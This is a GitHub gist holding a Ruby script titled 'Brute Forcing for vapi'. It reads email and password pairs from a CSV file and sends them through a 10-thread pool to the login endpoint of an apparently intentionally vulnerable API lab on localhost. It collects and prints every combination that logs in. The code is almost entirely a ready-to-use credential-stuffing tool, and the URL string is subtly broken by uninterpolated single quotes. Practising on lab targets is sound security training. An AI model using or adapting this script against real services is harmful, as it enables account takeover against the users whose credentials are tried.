Skip to content

Instantly share code, notes, and snippets.

@PatrickTulskie

PatrickTulskie/brute.rb

Created August 13, 2023 00:28
Show Gist options
  • Save PatrickTulskie/09514c3f32faf1830bff7fbe8822dafc to your computer and use it in GitHub Desktop.
Save PatrickTulskie/09514c3f32faf1830bff7fbe8822dafc to your computer and use it in GitHub Desktop.
Download ZIP
Brute Forcing for vapi
Raw
brute.rb
require 'net/http'
require 'json'
require 'csv'
require 'thread'
hostname = "localhost"
url = URI('http://#{hostname}/vapi/api2/user/login')
mutex = Mutex.new
# Thread pool size
pool_size = 10
work_queue = Queue.new
# Save the successful logins
successes = []
# Enqueue the tasks in the work queue
CSV.foreach('creds.csv') do |row|
work_queue.push(row)
end
workers = (1..pool_size).map do
Thread.new do
begin
while row = work_queue.pop(true)
email, password = row
http = Net::HTTP.new(url.host, url.port)
request = Net::HTTP::Post.new(url.path, { 'Content-Type' => 'application/json' })
request.body = { email: email, password: password }.to_json
response = http.request(request)
mutex.synchronize do
if response.body.include?('usernameOrPasswordIncorrect')
puts "Login failed for #{email}"
else
puts "Login succeeded for #{email}"
successes << row
end
end
end
rescue ThreadError
# Queue is empty
end
end
end
workers.map(&:join)
puts "Successful logins:"
puts successes.map { |row| row.join(',') }
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment